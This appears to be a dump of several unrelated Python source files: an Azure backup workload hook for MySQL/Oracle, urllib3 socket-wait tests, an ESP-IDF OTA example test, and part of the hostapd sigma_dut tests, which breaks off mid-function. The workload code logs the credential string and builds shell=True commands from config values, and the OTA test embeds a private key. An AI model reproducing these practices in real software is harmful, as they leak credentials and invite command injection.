args = self.sudo_user+" "+self.command+self.name+" "+self.cred_string+" < "+postscript
self.logger.log("WorkloadPatch: command to execute: "+str(args))
post_child = subprocess.Popen(args,stdout=subprocess.PIPE,stdin=subprocess.PIPE,shell=True,stderr=subprocess.PIPE)
elif 'oracle' in self.name.lower():
postOracleStatus = self.workloadStatus()
if postOracleStatus != preWorkloadStatus:
self.logger.log("WorkloadPatch: Error. Pre and post database status different.")
if "OPEN" in str(postOracleStatus):
self.logger.log("WorkloadPatch: Post- Database is open")
else:
self.logger.log("WorkloadPatch: Post- Database not open. Backup may proceed without pre and post")
return
self.logger.log("WorkloadPatch: Post- Inside oracle post")
if preDaemonThread.isAlive():
self.logger.log("WorkloadPatch: Post- Timeout daemon still in sleep")
self.logger.log("WorkloadPatch: Post- Initiating Post Script")
daemonProcess.terminate()
else:
self.logger.log("WorkloadPatch: Post error- Timeout daemon executed before post")
return
postOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/postOracleMaster.sql ")
args = [self.sudo_user, postOracle]
process = subprocess.Popen(args)
while process.poll()==None:
sleep(1)
self.logger.log("WorkloadPatch: Post- Completed")
self.callLogBackup()
#Add new workload support here
else:
self.logger.log("WorkloadPatch: Unsupported workload name")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadInvalidWorkloadName, "Workload Not supported"))
def preMasterDB(self):
pass
def preSlaveDB(self):
pass
def postMasterDB(self):
pass
def postSlaveDB(self):
pass
def confParser(self):
self.logger.log("WorkloadPatch: Entering workload config parsing")
configfile = '/etc/azure/workload.conf'
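# Illustrative sketch of the file this parser expects (section/option names are
# the ones read below; the values here are hypothetical):
#   [workload]
#   workload_name = mysql
#   command_path = /usr/bin/
#   credString = -u backup -pSecret
#   role = master
#   enforceSlaveOnly = 0
#   ipc_folder = /var/lib/azbackup
#   timeout = 90
#   linux_user = mysql
#   dbnames = mydb1;mydb2
#   [logbackup]          ; only the presence of this section is checked here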
try:
if os.path.exists(configfile):
config = ConfigParsers.ConfigParser()
config.read(configfile)
if config.has_section("workload"):
self.logger.log("WorkloadPatch: config section present for workloads ")
if config.has_option("workload", 'workload_name'):
self.name = config.get("workload", 'workload_name')
self.logger.log("WorkloadPatch: config workload command "+ self.name)
else:
return None
if config.has_option("workload", 'command_path'):
self.command = config.get("workload", 'command_path')
self.logger.log("WorkloadPatch: config workload command "+ self.command)
if config.has_option("workload", 'credString'):
self.cred_string = config.get("workload", 'credString')
self.logger.log("WorkloadPatch: config workload cred_string "+ self.cred_string)
elif not config.has_option("workload", 'linux_user'):
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadAuthorizationMissing, "Cred and linux user string missing"))
if config.has_option("workload", 'role'):
self.role = config.get("workload", 'role')
self.logger.log("WorkloadPatch: config workload role "+ self.role)
if config.has_option("workload", 'enforceSlaveOnly'):
self.enforce_slave_only = config.get("workload", 'enforceSlaveOnly')
self.logger.log("WorkloadPatch: config workload enforce_slave_only "+ self.enforce_slave_only)
if config.has_option("workload", 'ipc_folder'):
self.ipc_folder = config.get("workload", 'ipc_folder')
self.logger.log("WorkloadPatch: config ipc folder "+ self.ipc_folder)
if config.has_option("workload", 'timeout'):
self.timeout = config.get("workload", 'timeout')
self.logger.log("WorkloadPatch: config timeout of pre script "+ self.timeout)
if config.has_option("workload", 'linux_user'):
linux_user = config.get("workload", 'linux_user')
self.logger.log("WorkloadPatch: config linux user of pre script "+ linux_user)
self.sudo_user = "sudo -u "+linux_user
if config.has_option("workload", 'dbnames'):
dbnames_list = config.get("workload", 'dbnames') #mydb1;mydb2;mydb3
self.dbnames = dbnames_list.split(';')
if config.has_section("logbackup"):
self.logbackup = "enable"
self.logger.log("WorkloadPatch: Logbackup Enabled")
else:
self.logger.log("WorkloadPatch: workload config section missing. File system consistent backup")
else:
self.logger.log("WorkloadPatch: workload config file missing. File system consistent backup")
except Exception as e:
self.logger.log("WorkloadPatch: exception in workload conf file parsing")
if(self.name != None):
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadConfParsingError, "exception in workloadconfig parsing"))
def populateErrors(self):
if len(self.error_details) > 0:
errdetail = self.error_details[0]
return errdetail
else:
return None
def waitForPreScriptCompletion(self):
if self.ipc_folder != None:
wait_counter = 5
while len(self.child) == 0 and wait_counter > 0:
self.logger.log("WorkloadPatch: child not created yet", True)
wait_counter -= 1
sleep(2)
if wait_counter > 0:
self.logger.log("WorkloadPatch: sql subprocess Created "+str(self.child[0].pid))
else:
self.logger.log("WorkloadPatch: sql connection failed")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadConnectionError, "sql connection failed"))
return None
wait_counter = 60
while os.path.exists(self.outfile) == False and wait_counter > 0:
self.logger.log("WorkloadPatch: Waiting for sql to complete")
wait_counter -= 1
sleep(2)
if wait_counter > 0:
self.logger.log("WorkloadPatch: pre at server level completed")
else:
self.logger.log("WorkloadPatch: pre failed to quiesce")
self.error_details.append(ErrorDetail(CommonVariables.FailedWorkloadQuiescingError, "pre failed to quiesce"))
return None
def timeoutDaemon(self):
global preDaemonThread
if 'oracle' in self.name.lower():
self.logger.log("WorkloadPatch: Inside oracle condition in timeout daemon")
preDaemonOracle = self.command + "sqlplus" + " -s / as sysdba @" + os.path.join(os.getcwd(), "main/workloadPatch/scripts/preOracleDaemon.sql ") + self.timeout
argsDaemon = [self.sudo_user, preDaemonOracle]
preDaemonThread = threading.Thread(target=self.threadForTimeoutDaemon, args=[argsDaemon])
preDaemonThread.start()
self.logger.log("WorkloadPatch: timeoutDaemon started for: " + self.timeout + " seconds")
def threadForTimeoutDaemon(self, args):
global daemonProcess
daemonProcess = subprocess.Popen(args)
self.logger.log("WorkloadPatch: daemonProcess started")
wait_counter = self.timeout
while daemonProcess.poll() == None and wait_counter>0:
wait_counter -= 1
sleep(2)
self.logger.log("WorkloadPatch: daemonProcess completed")
def workloadStatus(self):
if 'oracle' in self.name.lower():
statusArgs = self.sudo_user + " " +"'" + self.command + "sqlplus" +" -s / as sysdba<<-EOF\nSELECT STATUS FROM V\$INSTANCE;\nEOF'"
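# statusArgs expands to roughly (illustrative): sudo -u <user> '<command_path>sqlplus
# -s / as sysdba<<-EOF ... SELECT STATUS FROM V$INSTANCE; ... EOF', i.e. the
# instance status is read via a sqlplus here-document and returned as raw output.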
oracleStatus = subprocess.check_output(statusArgs, shell=True)
self.logger.log("WorkloadPatch: workloadStatus- " + str(oracleStatus))
return oracleStatus
return "NOT APPLY"
def thread_for_sql(self,args):
self.logger.log("WorkloadPatch: command to execute: "+str(args))
self.child.append(subprocess.Popen(args,stdout=subprocess.PIPE,stdin=subprocess.PIPE,shell=True,stderr=subprocess.PIPE))
sleep(1)
def getRole(self):
return "master"
def callLogBackup(self):
if 'enable' in self.logbackup.lower():
self.logger.log("WorkloadPatch: Initializing logbackup")
logbackupObject = LogBackupPatch()
else:
return
|
test_wait.py
|
import signal
import threading
import time
from socket import socket, socketpair
from types import FrameType
from typing import Any, Callable, Generator, List, Optional, Tuple
import pytest
from urllib3.util.wait import (
_have_working_poll,
poll_wait_for_socket,
select_wait_for_socket,
wait_for_read,
wait_for_socket,
wait_for_write,
)
TYPE_SOCKET_PAIR = Tuple[socket, socket]
TYPE_WAIT_FOR = Callable[..., bool]
@pytest.fixture
def spair() -> Generator[TYPE_SOCKET_PAIR, None, None]:
a, b = socketpair()
yield a, b
a.close()
b.close()
variants: List[TYPE_WAIT_FOR] = [wait_for_socket, select_wait_for_socket]
if _have_working_poll():
variants.append(poll_wait_for_socket)
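# Each parametrized test below runs against the public wait_for_socket dispatcher,
# the select()-based implementation, and (when the platform has a working poll())
# the poll()-based implementation.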
@pytest.mark.parametrize("wfs", variants)
def test_wait_for_socket(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
with pytest.raises(RuntimeError):
wfs(a, read=False, write=False)
assert not wfs(a, read=True, timeout=0)
assert wfs(a, write=True, timeout=0)
b.send(b"x")
assert wfs(a, read=True, timeout=0)
assert wfs(a, read=True, timeout=10)
assert wfs(a, read=True, timeout=None)
# Fill up the socket with data
a.setblocking(False)
try:
while True:
a.send(b"x" * 999999)
except OSError:
pass
# Now it's not writable anymore
assert not wfs(a, write=True, timeout=0)
# But if we ask for read-or-write, that succeeds
assert wfs(a, read=True, write=True, timeout=0)
# Unless we read from it
assert a.recv(1) == b"x"
assert not wfs(a, read=True, write=True, timeout=0)
# But if the remote peer closes the socket, then it becomes readable
b.close()
assert wfs(a, read=True, timeout=0)
# Waiting for a socket that's actually been closed is just a bug, and
# raises some kind of helpful exception (exact details depend on the
# platform).
with pytest.raises(Exception):
wfs(b, read=True)
def test_wait_for_read_write(spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
assert not wait_for_read(a, 0)
assert wait_for_write(a, 0)
b.send(b"x")
assert wait_for_read(a, 0)
assert wait_for_write(a, 0)
# Fill up the socket with data
a.setblocking(False)
try:
while True:
a.send(b"x" * 999999)
except OSError:
pass
# Now it's not writable anymore
assert not wait_for_write(a, 0)
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: Optional[FrameType]) -> Any:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
start = time.monotonic()
try:
# Start delivering SIGALRM 10 times per second
signal.setitimer(signal.ITIMER_REAL, 0.1, 0.1)
# Sleep for 1 second (we hope!)
wfs(a, read=True, timeout=1)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
end = time.monotonic()
dur = end - start
assert 0.9 < dur < 3
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr_zero_timeout(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: Optional[FrameType]) -> Any:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
try:
# Start delivering SIGALRM 1000 times per second,
# to trigger race conditions such as
# https://github.com/urllib3/urllib3/issues/1396.
signal.setitimer(signal.ITIMER_REAL, 0.001, 0.001)
# Hammer the system call for a while to trigger the
# race.
for i in range(100000):
wfs(a, read=True, timeout=0)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
@pytest.mark.skipif(not hasattr(signal, "setitimer"), reason="need setitimer() support")
@pytest.mark.parametrize("wfs", variants)
def test_eintr_infinite_timeout(wfs: TYPE_WAIT_FOR, spair: TYPE_SOCKET_PAIR) -> None:
a, b = spair
interrupt_count = [0]
def handler(sig: int, frame: Optional[FrameType]) -> Any:
assert sig == signal.SIGALRM
interrupt_count[0] += 1
def make_a_readable_after_one_second() -> None:
time.sleep(1)
b.send(b"x")
old_handler = signal.signal(signal.SIGALRM, handler)
try:
assert not wfs(a, read=True, timeout=0)
start = time.monotonic()
try:
# Start delivering SIGALRM 10 times per second
signal.setitimer(signal.ITIMER_REAL, 0.1, 0.1)
# Sleep for 1 second (we hope!)
thread = threading.Thread(target=make_a_readable_after_one_second)
thread.start()
wfs(a, read=True)
finally:
# Stop delivering SIGALRM
signal.setitimer(signal.ITIMER_REAL, 0)
thread.join()
end = time.monotonic()
dur = end - start
assert 0.9 < dur < 3
finally:
signal.signal(signal.SIGALRM, old_handler)
assert interrupt_count[0] > 0
|
example_test.py
|
import re
import os
import sys
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
try:
import IDF
except ImportError:
# this is a test case written with tiny-test-fw.
# to run test cases outside tiny-test-fw,
# we need to set the environment variable `TEST_FW_PATH`,
# then insert `TEST_FW_PATH` into sys.path before importing the FW module
test_fw_path = os.getenv("TEST_FW_PATH")
if test_fw_path and test_fw_path not in sys.path:
sys.path.insert(0, test_fw_path)
import IDF
import DUT
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def start_https_server(ota_image_dir, server_ip, server_port):
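# Sketch of this helper: it writes the embedded self-signed cert/key into
# ota_image_dir, chdirs there, and serves the directory (including the built
# simple_ota.bin) over HTTPS so the DUT can fetch the OTA image from the host.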
# parser = argparse.ArgumentParser()
# parser.add_argument('-p', '--port', dest='port', type= int,
# help= "Server Port", default= 8000)
# args = parser.parse_args()
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
key_file_handle = open("server_key.pem", "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@IDF.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_simple_ota_example(env, extra_data):
"""
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("simple_ota_example", "examples/system/ota/simple_ota_example")
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "simple_ota.bin")
bin_size = os.path.getsize(binary_file)
IDF.log_performance("simple_ota_bin_size", "{}KB".format(bin_size // 1024))
IDF.check_performance("simple_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8000))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset 0x10000", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
# thread1 is a daemon thread serving HTTPS requests; it exits with the test process.
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8000/simple_ota.bin"))
dut1.write("https://" + host_ip + ":8000/simple_ota.bin")
dut1.expect("Loaded app from partition at offset 0x110000", timeout=60)
dut1.expect("Starting OTA example", timeout=30)
if __name__ == '__main__':
test_examples_protocol_simple_ota_example()
|
test_sigma_dut.py
|
# Test cases for sigma_dut
# Copyright (c) 2017, Qualcomm Atheros, Inc.
# Copyright (c) 2018-2019, The Linux Foundation
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import errno
import fcntl
import hashlib
import logging
logger = logging.getLogger()
import os
import socket
import struct
import subprocess
import threading
import time
import hostapd
from utils import *
from hwsim import HWSimRadio
import hwsim_utils
from wlantest import Wlantest
from tshark import run_tshark
from test_dpp import check_dpp_capab, update_hapd_config, wait_auth_success
from test_suite_b import check_suite_b_192_capa, suite_b_as_params, suite_b_192_rsa_ap_params
from test_ap_eap import check_eap_capa, int_eap_server_params, check_domain_match, check_domain_suffix_match
from test_ap_hs20 import hs20_ap_params
from test_ap_pmf import check_mac80211_bigtk
from test_ocv import check_ocv_failure
def check_sigma_dut():
if not os.path.exists("./sigma_dut"):
raise HwsimSkip("sigma_dut not available")
def to_hex(s):
return binascii.hexlify(s.encode()).decode()
def from_hex(s):
return binascii.unhexlify(s).decode()
def sigma_log_output(cmd):
try:
out = cmd.stdout.read()
if out:
logger.debug("sigma_dut stdout: " + str(out.decode()))
except IOError as e:
if e.errno != errno.EAGAIN:
raise
try:
out = cmd.stderr.read()
if out:
logger.debug("sigma_dut stderr: " + str(out.decode()))
except IOError as e:
if e.errno != errno.EAGAIN:
raise
sigma_prog = None
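# sigma_dut speaks a plain-text CAPI protocol over TCP (port 9000 by default):
# each command is a comma-separated key/value line terminated by CR-LF, and the
# response lines start with "status,RUNNING" (interim), "status,COMPLETE",
# "status,ERROR" or "status,INVALID" (terminal), which is what the helper below parses.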
def sigma_dut_cmd(cmd, port=9000, timeout=2):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
sock.settimeout(timeout)
addr = ('127.0.0.1', port)
sock.connect(addr)
sock.send(cmd.encode() + b"\r\n")
try:
res = sock.recv(1000).decode()
running = False
done = False
for line in res.splitlines():
if line.startswith("status,RUNNING"):
running = True
elif line.startswith("status,INVALID"):
done = True
elif line.startswith("status,ERROR"):
done = True
elif line.startswith("status,COMPLETE"):
done = True
if running and not done:
# Read the actual response
res = sock.recv(1000).decode()
except:
res = ''
pass
sock.close()
res = res.rstrip()
logger.debug("sigma_dut: '%s' --> '%s'" % (cmd, res))
global sigma_prog
if sigma_prog:
sigma_log_output(sigma_prog)
return res
def sigma_dut_cmd_check(cmd, port=9000, timeout=2):
res = sigma_dut_cmd(cmd, port=port, timeout=timeout)
if "COMPLETE" not in res:
raise Exception("sigma_dut command failed: " + cmd)
return res
def start_sigma_dut(ifname, hostapd_logdir=None, cert_path=None,
bridge=None, sae_h2e=False, owe_ptk_workaround=False):
check_sigma_dut()
cmd = ['./sigma_dut',
'-d',
'-M', ifname,
'-S', ifname,
'-F', '../../hostapd/hostapd',
'-G',
'-w', '/var/run/wpa_supplicant/',
'-j', ifname]
if hostapd_logdir:
cmd += ['-H', hostapd_logdir]
if cert_path:
cmd += ['-C', cert_path]
if bridge:
cmd += ['-b', bridge]
if sae_h2e:
cmd += ['-2']
if owe_ptk_workaround:
cmd += ['-3']
sigma = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
for stream in [sigma.stdout, sigma.stderr]:
fd = stream.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
global sigma_prog
sigma_prog = sigma
res = None
for i in range(20):
try:
res = sigma_dut_cmd("HELLO")
break
except:
time.sleep(0.05)
if res is None or "errorCode,Unknown command" not in res:
raise Exception("Failed to start sigma_dut")
return {'cmd': sigma, 'ifname': ifname}
def stop_sigma_dut(sigma):
global sigma_prog
sigma_prog = None
cmd = sigma['cmd']
sigma_log_output(cmd)
logger.debug("Terminating sigma_dut process")
cmd.terminate()
cmd.wait()
out, err = cmd.communicate()
logger.debug("sigma_dut stdout: " + str(out.decode()))
logger.debug("sigma_dut stderr: " + str(err.decode()))
subprocess.call(["ip", "addr", "del", "dev", sigma['ifname'],
"127.0.0.11/24"],
stderr=open('/dev/null', 'w'))
def sigma_dut_wait_connected(ifname):
for i in range(50):
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
break
time.sleep(0.2)
if i == 49:
raise Exception("Connection did not complete")
def test_sigma_dut_basic(dev, apdev):
"""sigma_dut basic functionality"""
sigma = start_sigma_dut(dev[0].ifname)
tests = [("ca_get_version", "status,COMPLETE,version,1.0"),
("device_get_info", "status,COMPLETE,vendor"),
("device_list_interfaces,interfaceType,foo", "status,ERROR"),
("device_list_interfaces,interfaceType,802.11",
"status,COMPLETE,interfaceType,802.11,interfaceID," + dev[0].ifname)]
try:
res = sigma_dut_cmd("UNKNOWN")
if "status,INVALID,errorCode,Unknown command" not in res:
raise Exception("Unexpected sigma_dut response to unknown command")
for cmd, response in tests:
res = sigma_dut_cmd(cmd)
if response not in res:
raise Exception("Unexpected %s response: %s" % (cmd, res))
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_open(dev, apdev):
"""sigma_dut controlled open network association"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
hapd = hostapd.add_ap(apdev[0], {"ssid": "open"})
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_encryption,interface,%s,ssid,%s,encpType,none" % (ifname, "open"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "open"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_psk_pmf(dev, apdev):
"""sigma_dut controlled PSK+PMF association"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "test-pmf-required", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_psk_pmf_bip_cmac_128(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-CMAC-128"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-128", "AES-128-CMAC")
def test_sigma_dut_psk_pmf_bip_cmac_256(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-CMAC-256"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-CMAC-256", "BIP-CMAC-256")
def test_sigma_dut_psk_pmf_bip_gmac_128(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-128"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-128", "BIP-GMAC-128")
def test_sigma_dut_psk_pmf_bip_gmac_256(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-256"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "BIP-GMAC-256")
def test_sigma_dut_psk_pmf_bip_gmac_256_mismatch(dev, apdev):
"""sigma_dut controlled PSK+PMF association with BIP-GMAC-256 mismatch"""
run_sigma_dut_psk_pmf_cipher(dev, apdev, "BIP-GMAC-256", "AES-128-CMAC",
failure=True)
def run_sigma_dut_psk_pmf_cipher(dev, apdev, sigma_cipher, hostapd_cipher,
failure=False):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-pmf-required"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params["wpa_key_mgmt"] = "WPA-PSK-SHA256"
params["ieee80211w"] = "2"
params["group_mgmt_cipher"] = hostapd_cipher
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
